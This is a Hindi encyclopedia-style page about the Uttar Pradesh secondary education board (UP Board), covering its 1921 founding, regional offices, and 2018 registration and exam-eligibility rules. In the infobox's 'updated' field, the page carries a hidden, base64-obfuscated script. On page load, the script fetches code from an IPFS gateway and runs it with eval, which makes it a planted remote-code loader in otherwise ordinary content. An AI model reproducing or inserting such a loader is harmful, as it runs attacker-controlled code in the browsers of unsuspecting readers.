माध्यमिक शिक्षा परिषद, उत्तर प्रदेश

भारत डिस्कवरी प्रस्तुति
(उ.प्र. बोर्ड से पुनर्निर्देशित)
यहाँ जाएँ:भ्रमण, खोजें
माध्यमिक शिक्षा परिषद, उत्तर प्रदेश
माध्यमिक शिक्षा परिषद, उत्तर प्रदेश का प्रतीक चिह्न
अन्य नाम यू.पी. बोर्ड
उद्देश्य हाई स्कूल एवं इण्टरमीडिएट की परीक्षा आयोजित करना।
स्थापना 1921 ई.
मुख्यालय सेक्टर 32, ताशकंद मार्ग, इलाहाबाद, उत्तर प्रदेश-211001
प्रसिद्धि यह दुनिया की सबसे बड़ी परीक्षा संचालित करने वाली संस्था है।
क्षेत्रीय कार्यालय मेरठ, वाराणसी, बरेली, इलाहाबाद
अन्य जानकारी बोर्ड ने 10+2 शिक्षा प्रणाली अपनायी हुई है। यह 10वीं एवं 12वीं कक्षा के विद्यार्थियों के लिये सार्वजनिक परीक्षा आयोजित करता है।
बाहरी कड़ियाँ आधिकारिक वेबसाइट
अद्यतन‎ <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

माध्यमिक शिक्षा परिषद, उत्तर प्रदेश / उत्तर प्रदेश शिक्षा बोर्ड / यू.पी. बोर्ड (अंग्रेज़ी: Board of High School and Intermediate Education Uttar Pradesh) हाईस्कूल एवं इण्टरमीडिएट स्तर की परीक्षाओं को संचालित करने वाली विश्व की एक सर्वोच्च संस्था है। इसका मुख्यालय इलाहाबाद में है। यह दुनिया की सबसे बड़ी परीक्षा संचालित करने वाली संस्था है। इसे संक्षेप में "यू.पी. बोर्ड" के नाम से भी जाना जाता है। बोर्ड ने 10+2 शिक्षा प्रणाली अपनायी हुई है। यह 10वीं एवं 12वीं कक्षा के विद्यार्थियों के लिये सार्वजनिक परीक्षा आयोजित करता है।

स्थापना

माध्यमिक शिक्षा परिषद, उत्तर प्रदेश की स्थापना सन् 1921 में इलाहाबाद में संयुक्त प्रान्त वैधानिक परिषद[1] के एक अधिनियम द्वारा की गई थी। इसने सबसे पहले सन् 1923 में परीक्षा आयोजित की। यह भारत का प्रथम शिक्षा बोर्ड था जिसने सर्वप्रथम 10+2 परीक्षा पद्धति अपनायी थी। इस पद्धति के अंतर्गत प्रथम सार्वजनिक बोर्ड परीक्षा का आयोजन 10 वर्षों की शिक्षा उपरांत, जिसे हाई-स्कूल परीक्षा एवं द्वितीय सार्वजनिक परीक्षा 10+2=12 वर्ष की शिक्षा के उपरांत दिये जाते हैं, जिसे इंटरमीडियेट परीक्षा कहते हैं। इसके पहले इलाहाबाद विश्वविद्यालय "हाई स्कूल" एवं "इण्टरमिडिएट" की परीक्षाएं आयोजित करता था।

उ.प्र. शिक्षा बोर्ड के कार्य

उत्तर प्रदेश बोर्ड का मुख्य कार्य राज्य में हाई स्कूल एवं इण्टरमीडिएट की परीक्षा आयोजित करना होता है। इसके अलावा राज्य में स्थित विद्यालयों को मान्यता देना, हाई स्कूल एवं इण्टरमीडिएट स्तर के लिये पाठ्यक्रम एवं पुस्तकें निर्धारित करना भी प्रमुख कार्य है। साथ ही यह बोर्ड अन्य बोर्डों द्वारा ली गयी परीक्षाओं को तुल्यता प्रदान करता है। आने वाले समय में सदा बढ़ते रहने वाले कार्यभार को देखते हुए, बोर्ड को पूरे क्षेत्र की अपनी गतिविधियों का इलाहाबाद स्थित केन्द्रीय कार्यालय से नियंत्रण और संचालन में कई समस्याओं का सामना करना पड़ रहा था। अतः बोर्ड के चार क्षेत्रीय कार्यालयों की स्थापना मेरठ[2], वाराणसी[3], बरेली[4] और इलाहाबाद [5]में की गई। इन कार्यालयों में क्षेत्रीय सचिवों की नियुक्ति की गईं, जिनके ऊपर इलाहाबाद स्थित मुख्यालय के सचिव प्रधान कार्यपालक के रूप में कार्यरत रहते हैं। कुछ वर्ष पूर्व रामनगर[6] स्थित कार्यालय को 8 नवंबर, 2000 को उत्तरांचल राज्य के गठन के समय यू.पी. बोर्ड से अलग कर दिया गया। वर्तमान आंकड़ों के अनुसार बोर्ड 32 लाख से अधिक छात्रों की परीक्षाएं संचालित करता है।

सामान्य जानकारी एवं निर्देश

  1. परिषद् की वर्ष 2018 की हाईस्कूल एवं इण्टरमीडिएट परीक्षा में सम्मिलित होने हेतु परिषद् द्वारा नियमानुसार मान्यता प्राप्त प्रत्येक विद्यालय के अभ्यर्थियों का शैक्षिक सत्र 2017-18 में कक्षा- 9 एवं कक्षा- 11 में यथास्थिति परिषद् की वेबसाइट (www.upmsp.edu.in) पर विद्यालय द्वारा ऑनलाइन अग्रिम पंजीकरण कराना अनिवार्य है। अग्रिम पंजीकरण कराने की अंतिम तिथि 01/10/2017 है।
  2. वर्ष 2018 की हाईस्कूल एवं इण्टरमीडिएट की परीक्षा में सम्मिलित होने वाले संस्थागत एवं व्यक्तिगत छात्र/छात्राओं के विवरणों को ऑनलाइन करने एवं गत वर्ष के ऑनलाइन पंजीकरण कराये कक्षा- 9 एवं कक्षा-11 के छात्र/छात्राओं के विवरणों में आंशिक संशोधन यथा छात्र/छात्राओं की मिसिंग फ़ोटो को अपलोड करने, उनके विषय, जन्म तिथि एवं अन्य विवरणों में संशोधन करने एवं कक्षा-9/11 में अनुत्तीर्ण हो गये अथवा विद्यालय छोड़ चुके छात्र/छात्राओं के विवरणों को हटाने करने की समस्त कार्रवाई परिषद द्वारा निर्धारित समय सारिणी के अनुसार की जायेगी। नाम में ऑनलाइन संशोधन प्रतिबन्धित रहेगा।
  3. व्यक्तिगत छात्र/छात्राओं के विवरणों को ऑनलाइन करने हेतु, उनके शैक्षिक विवरणों को लेने हेतु, उन्हें एक निर्धारित आवेदन पत्र भर कर एवं उसके साथ परीक्षा में सम्मिलित होने हेतु समस्त आवश्यक अहर्ता के प्रमाणपत्र को सलंग्न कर व्यक्तिगत परीक्षा के अग्रसारण केन्द्र में जमा करना होगा। संस्थागत छात्र/छात्राओं के विवरणों को विद्यालय के प्रधानाचार्य द्वारा विद्यालयीय अभिलेखों से तैयार कर उन्हें ऑनलाइन किया जायेगा।
  4. यूज़र आई.डी. के बॉक्स में सम्बन्धित विद्यालय के जनपद का दो अंकीय कोड तथा विद्यालय का स्वयं का परिषदीय परीक्षाओं में प्रयुक्त होने वाला चार अंकीय कोड मिलाकर संयुक्त रुप से अंकित किया जायेगा। उदाहरणार्थ- जनपद मथुरा जिसका परिषद् द्वारा निर्धारित जनपद कोड 05 है, उसमें स्थित विद्यालय जिसका कोड 1275 है, उसके लिये यूज़र आई.डी. के बॉक्स में 051275 अंकित किया जायेगा। इसी विधि से अन्य विद्यालयों के लिये यूज़र आई.डी. निर्धारित की गयी है।
  5. पासवर्ड के बॉक्स के अन्दर परिषद् द्वारा ज़िला विद्यालय निरीक्षक के माध्यम से विद्यालय को उपलब्ध कराये गये 8 अंकीय गोपनीय पासवर्ड को अंकित किया जायेगा। इस पासवर्ड को सम्बन्धित विद्यालय के प्रधानाचार्य द्वारा अत्यन्त सावधानी एवं गोपनीयता से प्रयोग करना होगा।
  6. उपर्युक्त सभी प्रकार के कार्यों के सम्पादन हेतु विद्यालयों की यूज़र आई. डी. एवं पासवर्ड वही रहेगा जिसके द्वारा गत वर्ष विद्यालयों द्वारा ऑनलाइन अग्रिम पंजीकरण कराया गया था। अपना पासवर्ड यदि आप भूल गये हैं तब अपने जनपद के ज़िला विद्यालय निरीक्षक से उसे रिसेट कराकर नवीन पासवर्ड ले लें।
  7. सत्र 2017-18 के कक्षा 9 एवं 11 के नवीन पंजीकरण एवं वर्ष 2018 की हाईस्कूल एवं इण्टरमीडिएट की परीक्षा में सम्मिलित होने वाले संस्थागत एवं व्यक्तिगत छात्र/छात्राओं के विवरणों को ऑनलाइन करने के कार्य को प्रारम्भ करने से पूर्व महत्वपूर्ण निर्देशों को डाउनलोड करके उसे सम्यक रुप से पढ़ एवं समझ लेने के उपरांत ही निर्देशानुसार ऑनलाइन अग्रिम पंजीकरण की कार्रवाई प्रारम्भ करें।
  8. ट्रेजरी चालान- शैक्षिक सत्र 2017-18 से परिषद के पंजीकरण, परीक्षा एवं अन्य विविध कार्यों हेतु कोषागार में जमा किये जाने वाले शुल्कों हेतु ट्रेजरी चालान का प्रारूप संशोधित कर दिया गया है। अतः अब से परिषद के जो भी शुल्क कोषागार में जमा किये जायेंगे उन्हें इसी संशोधित ट्रेजरी चालान से जमा करना अनिवार्य होगा।
  9. पत्राचार पंजीकरण केंद्र- पत्राचार शिक्षा संस्थान, उत्तर प्रदेश इलाहाबाद के पत्रांक पत्राचार 4451 दिनांक 11-03-2016 में दिए गये निर्देश के अनुसार पत्राचार शिक्षण की पंजीकरण की व्यवस्था के अनुसार पत्राचार शिक्षा हेतु पंजीकृत अभ्यर्थियों को इण्टरमीडिएट व्यक्तिगत परीक्षा के अपने परीक्षा आवेदन-पत्र को जनपद में निर्धारित पत्राचार शिक्षा पंजीकरण केन्द्र के प्रधानाचार्य के माध्यम से उसी विद्यालय से ही अग्रसारित करना अनिवार्य है। अतः वर्ष 2018 की इण्टरमीडिएट व्यक्तिगत परीक्षा में सम्मिलित होने हेतु पत्राचार शिक्षा हेतु पंजीकृत अभ्यर्थी जनपद में निर्धारित पत्राचार शिक्षा पंजीकरण केन्द्र के अतिरिक्त किसी अन्य विद्यालय अपने परीक्षा आवेदन-पत्र को अग्रसारित एवं ऑनलाइन कराते हैं तब उनके परीक्षा आवेदन-पत्र स्वतः निरस्त माने जायेंगे। जिसके लिए अभ्यर्थी स्वयं उत्तरदायी होंगे।
  10. अनुत्तीर्ण छात्र/छात्राओं की अहर्ता की जाँच- गत वर्ष/वर्षों में परिषद् की हाईस्कूल/इण्टरमीडिएट परीक्षा में अनुत्तीर्ण होने के आधार पर वर्ष 2017 की हाईस्कूल/इण्टरमीडिएट में सम्मिलित होने वाले छात्र/छात्राओं के विवरणों को ऑनलाइन अपलोड करने से पूर्व समस्त विद्यालयों के प्रधानाचार्यों को स्पष्ट रूप से निर्देशित किया जाता है कि वे सम्बन्धित छात्र/छात्रा के अहर्ता सम्बंधी अनुत्तीर्ण होने के विवरणों की पुष्टि अवश्य कर ले। प्रधानाचार्यों की सुविधा के लिये वर्ष 2003 से 2016 तक के परीक्षाफलों के विवरण परिषद् की वेबसाइट (www.upmspresults.up.nic.in) पर तथा वर्ष 2016 एवं 17 के परीक्षाफल वेबसाइट (www.upmsp.nic.in) एवं इसी वेबसाइट (www.upmsp.edu.in) पर उपलब्ध हैं। प्रधानाचार्य पूर्णरूपेण संतुष्ट होने के उपरान्त ही परिषदीय परीक्षा में सम्मिलित कराये जाने हेतु केवल अर्ह छात्र/छात्राओं शैक्षिक विवरणों कों अपलोड करें। छात्र/छात्राओं के अहर्ता सम्बंधी विवरणों की सघन जांच परिषद् के सम्बन्धित क्षेत्रीय कार्यालयों द्वारा भी की जायेगी, जिससे कोई भी अनर्ह छात्र/छात्रा परिषदीय परीक्षाओं में सम्मिलित न होने पाये।
  11. वर्ष 2018 की परिषदीय परीक्षा में निम्नाकिंत श्रेणीयों के छात्र/छात्रा परीक्षा में सम्मिलित हो सकते हैं:-

हाईस्कूल संस्थागत परीक्षा

  • विद्यालय में कक्षा-10 में नियमित अध्ययनरत सत्र 2016-17 में अपने ही विद्यालय से कक्षा-9 में अग्रिम पंजीकरण कराये उत्तीर्ण छात्र/छात्रा।
  • विद्यालय में कक्षा-10 में नियमित अध्ययनरत माध्यमिक शिक्षा परिषद की हाईस्कूल संस्थागत परीक्षा में केवल एक बार अनुत्तीर्ण रहे छात्र/छात्रा।
  • क्रेडिट सिस्टम के छात्र / छात्रा ।
  • विद्यालय में कक्षा-10 में नियमित अध्ययनरत सत्र 2016-17 के पूर्व सत्रों में अपने ही विद्यालय से कक्षा-9 में अग्रिम पंजीकरण कराये उत्तीर्ण छात्र/छात्रा ।
  • विद्यालय में कक्षा-10 में नियमित अध्ययनरत बाह्य छात्र / छात्राओं के अंतर्गत परिषद के अन्य विद्यालयों से कक्षा-9 में अग्रिम पंजीकरण कराये हुए उत्तीर्ण छात्र/छात्रा।
  • विधि द्वारा स्थापित अन्य शिक्षा बोर्डों से परीक्षार्थी का कक्षा-9 उत्तीर्ण होने अथवा हाईस्कूल या उसके समकक्ष परीक्षा में अनुत्तीर्ण छात्र/छात्रा।

हाईस्कूल व्यक्तिगत परीक्षा

  • माध्यमिक शिक्षा परिषद की हाईस्कूल परीक्षा में अनुत्तीर्ण रहे छात्र/छात्रा।
  • क्रेडिट सिस्टम के छात्र/छात्रा।
  • माध्यमिक शिक्षा परिषद द्वारा कक्षा-9 में अग्रिम पंजीकरण कराये उत्तीर्ण छात्र/छात्रा।
  • विधि द्वारा स्थापित देश के अन्य शिक्षा बोर्डों से कक्षा-9 उत्तीर्ण छात्र/छात्रा ।
  • विधि द्वारा स्थापित देश के अन्य शिक्षा बोर्डों से हाईस्कूल या उसके समकक्ष परीक्षा में अनुत्तीर्ण रहे छात्र/छात्रा।
  • पूर्व में हाईस्कूल परीक्षा उत्तीर्ण कर चुके वे छात्र / छात्रा जो विनियम के अन्तर्गत अतिरिक्त विषयों में परीक्षा में सम्मिलित होना चाहते हैं।
  • कारागार में निरुद्ध बंदी छात्र / छात्रा।
  • भारतीय सेना में नियमित रुप से कार्यरत सैन्यकर्मी।
  • आई.टी.आई. उत्तीर्ण छात्र/छात्रा जो हाईस्कूल अथवा इण्टर की समकक्षता प्राप्त करने हेतु हिन्दी विषय से परीक्षा में सम्मिलित होना चाहते हैं।

इण्टरमीडिएट संस्थागत परीक्षा

  • विद्यालय में कक्षा-12 में नियमित अध्ययनरत सत्र 2016-17 में अपने ही विद्यालय से कक्षा-11 में अग्रिम पंजीकरण कराये उत्तीर्ण छात्र/छात्रा।
  • विद्यालय में कक्षा-12 में नियमित अध्ययनरत माध्यमिक शिक्षा परिषद की इण्टरमीडिएट संस्थागत परीक्षा में केवल एक बार अनुत्तीर्ण रहे छात्र/छात्रा ।
  • विद्यालय में कक्षा-12 में नियमित अध्ययनरत सत्र 2016-17 के पूर्व सत्रों में अपने ही विद्यालय से कक्षा-11 में अग्रिम पंजीकरण कराये उत्तीर्ण छात्र/छात्रा
  • विद्यालय में कक्षा-12 में नियमित अध्ययनरत बाह्य छात्र/छात्राओं के अंतर्गत परिषद द्वारा मान्यता प्राप्त अन्य विद्यालयों से कक्षा-11 में अग्रिम पंजीकरण कराये हुए उत्तीर्ण छात्र/छात्रा।
  • विधि द्वारा स्थापित अन्य शिक्षा बोर्डों से परीक्षार्थी का कक्षा-11 उत्तीर्ण होने अथवा इण्टरमीडिएट या उसके समकक्ष परीक्षा में अनुत्तीर्ण छात्र/छात्रा।

इण्टरमीडिएट व्यक्तिगत परीक्षा

  • माध्यमिक शिक्षा परिषद की इण्टरमीडिएट परीक्षा में अनुत्तीर्ण रहे छात्र/छात्रा।
  • माध्यमिक शिक्षा परिषद / विधि द्वारा स्थापित देश के अन्य शिक्षा बोर्डों से कक्षा-11 में अग्रिम पंजीकरण कराये हुए उत्तीर्ण छात्र/छात्रा एवं कक्षा-12 हेतु एक वर्षीय पत्राचार पाठ्यक्रम में पंजीकृत छात्र/छात्रा।
  • कक्षा-11 एवं कक्षा-12 हेतु दो वर्षीय पत्राचार पाठ्यक्रम में पंजीकृत छात्र/छात्रा ।
  • विधि द्वारा स्थापित देश के अन्य शिक्षा बोर्डों से इण्टरमीडिएट या उसके समकक्ष परीक्षा में अनुत्तीर्ण रहे छात्र/छात्रा ।
  • पूर्व में इण्टरमीडिएट परीक्षा उत्तीर्ण कर चुके वे छात्र / छात्रा जो विनियम के अन्तर्गत अतिरिक्त विषयों में परीक्षा में सम्मिलित होना चाहते हैं।
  • काराग़ार में निरुद्ध बंदी छात्र / छात्रा ।
  • भारतीय सेना में नियमित रुप से कार्यरत सैन्यकर्मी ।
  • आई.टी.आई उत्तीर्ण छात्र/छात्रा जो हाईस्कूल अथवा इण्टर की समकक्षता प्राप्त करने हेतु हिन्दी विषय से परीक्षा में सम्मिलित होना चाहते हैं।

11. दो स्थानों से अग्रसारित/अपलोड हुए परीक्षा आवेदनों का निरस्तीकरण- वर्ष 2018 की हाईस्कूल अथवा इण्टरमीडिएट परीक्षा में सम्मिलित होने हेतु कोई भी छात्र/छात्रा यदि दो या उससे अधिक विद्यालयों से अपने परीक्षा आवेदन-पत्र को तथ्यगोपन करके प्रधानाचार्य के माध्यम से अग्रसारित एवं अपलोड कराता है, तब उस स्थिति में उस छात्र/छात्रा के सभी परीक्षा आवेदन निरस्त कर दिये जायेगें, जिसके लिये सम्बन्धित छात्र/ छात्रा स्वयं उत्तरदायी होंगे।

12. छात्र/छात्राओं का विद्यालय परिवर्तन- सत्र 2016-17 में ऑनलाइन अग्रिम पंजीकरण कराये कक्षा-9 अथवा 11 के उत्तीर्ण छात्र/ छात्रा द्वारा यदि अपरिहार्य स्थितियों में विद्यालय परिवर्तन कर नियमानुसार दूसरे विद्यालय में कक्षा-10 अथवा 12 में प्रवेश लिया जाता है तब उस स्थिति में प्रथम विद्यालय के प्रधानाचार्य का यह व्यक्तिगत उत्तरदायित्व होगा कि वह स्थानान्तरित हुए छात्र/छात्रा के ऑनलाइन अग्रिम पंजीकरण के विवरणों को अनिवार्यत अपने विद्यालय से ऑनलाइन डिलीट कर दें। अन्यथा उस छात्र/छात्रा का दूसरे विद्यालय में प्रवेश लेना सम्भव नहीं हो सकेगा।

13. सत्र 2017-18 के कक्षा-11 के कृषि भाग-1 के अभ्यर्थियों का ऑनलाइन अग्रिम पंजीकरण/वर्ष-2018 की कक्षा-11 की परिषदीय परीक्षा में उन्हें सम्मिलित कराया जाना- सत्र 2017-18 के कक्षा-11 के कृषि भाग-1 के समस्त अभ्यर्थियों का अग्रिम पंजीकरण शुल्क भी जमा कराया जायेगा तथा उनका ऑनलाइन अग्रिम पंजीकरण भी कराया जायेगा। इसके साथ ही वर्ष 2017 की कृषि भाग-1 की परिषदीय परीक्षा में सम्मिलित होने हेतु उनका निर्धारित परीक्षा शुल्क भी जमा कराया जायेगा। वर्ष 2018 की कृषि भाग-1 की परिषदीय परीक्षा में सम्मिलित होने हेतु इन अभ्यर्थियों के शैक्षिक विवरण उनके कक्षा-11 के ऑनलाइन अग्रिम पंजीकरण के डाटा से ही ले लिये जायेगें।

14. प्रधानाचार्यो के लिये अत्यावश्यक विशेष निर्देश- वर्ष 2018 के हाईस्कूल/इण्टरमीडिएट छात्र/ छात्राओं एवं सत्र 2017-18 (परीक्षा वर्ष-2018) के कक्षा-9/11 के छात्र/ छात्राओं के अग्रिम पंजीकरण की कार्रवाई इनसे सम्बन्धित उपर्युक्त विज्ञप्तियों में निर्धारित अन्तिम तिथि/समय तक ही कराई जा सकेगी। निर्धारित अन्तिम तिथि/समय के पश्चात यह वेबसाइट स्वतः बन्द हो जायेगी। अतः विद्यालयों के प्रधानाचार्यो को यह ध्यान रखना होगा कि डाटा अपलोड करने एवं उसमें यथा-आवश्यक संशोधनों की समग्र कार्रवाई शीघ्रातिशीघ्र पूर्ण कर लें इसके लिये अन्तिम तिथि की प्रतीक्षा न करें, अन्यथा अन्त समय में कतिपय आकस्मिकताओं की स्थितियों में वेबसाइट पर ऑनलाइन डाटा अपलोड करने की कार्रवाई प्रभावित होती है तो इसका सम्पूर्ण उत्तरदायित्व सम्बन्धित विद्यालय प्रधानाचार्य का ही होगा।

निर्धारित अन्तिम तिथि/समय के पूर्व उक्त कार्यों हेतु ऑनलाइन डाटा अपलोड करने की प्रक्रिया के दौरान विद्यालय जितनी बार चाहे पंजीकृत हुये छात्र/छात्राओं के समस्त विवरणों की फ़ोटोयुक्त चेकलिस्ट डाउनलोड कर उसे विद्यालयी अभिलेखानुसार बारम्बार संशोधित एवं परिवर्धित कर सकता है। छात्र हित में उचित होगा कि इस चेकलिस्ट को सम्बन्धित छात्र/छात्राओं के मध्य वितरित कर उनके विवरणों की जांच स्वयं उनसे भी करा ली जाये, जिससे कि किसी भी छात्र/छात्रा के शैक्षिक विवरणों में किसी भी प्रकार की त्रुटि एवं विसंगति न रहने पाये। डाटा अपलोड करने की निर्धारित अन्तिम तिथि/समय के पश्चात छात्र/छात्राओं के विवरणों में भविष्य में किसी भी प्रकार का संशोधन नहीं हो सकेगा।

समस्त संशोधनों को कर लेने के उपरान्त विद्यालय के प्रधानाचार्य यदि सन्तुष्ट हो जाते हैं कि सभी छात्र/छात्राओं के विवरण अपलोड हो गये है तथा उनमें अब किसी प्रकार की विसंगति/त्रुटि नहीं है तभी वह इन्हें वेबसाइट पर अन्तिम रूप से परिषद् के लिए सबमिट करेंगे। अन्तिम रूप से सबमिट करने के उपरान्त विद्यालय के प्रधानाचार्य द्वारा भविष्य में किसी प्रकार का संशोधन नहीं किया जा सकेगा। अतः डाटा को अन्तिम रूप से सबमिट करने की कार्रवाई पूर्णतया सोच-समझ कर समस्त कार्य पूर्ण कर लेने के उपरान्त ही समयान्तर्गत की जाय। अन्तिम रूप से संशोधित कर सबमिट किया हुआ डाटा ही परिषद् स्वीकार करेगा तथा यही छात्र/छात्रा परीक्षा/अग्रिम पंजीकरण हेतु पंजीकृत माने जायेंगे। वेबसाइट पर विद्यालय द्वारा छात्र/ छात्राओं के अपलोड किये गये डाटा को वेबसाइट पर यदि परिषद् को सबमिट नहीं किया जायेगा तब ऐसे सभी छात्र/छात्रा गैर-पंजीकृत माने जायेंगे।


टीका टिप्पणी और संदर्भ

  1. यूनाइटेड प्रोविन्स लेजिस्लेटिव काउन्सिल
  2. 1973
  3. 1978
  4. 1981
  5. 1987
  6. नैनीताल

बाहरी कड़ियाँ

संबंधित लेख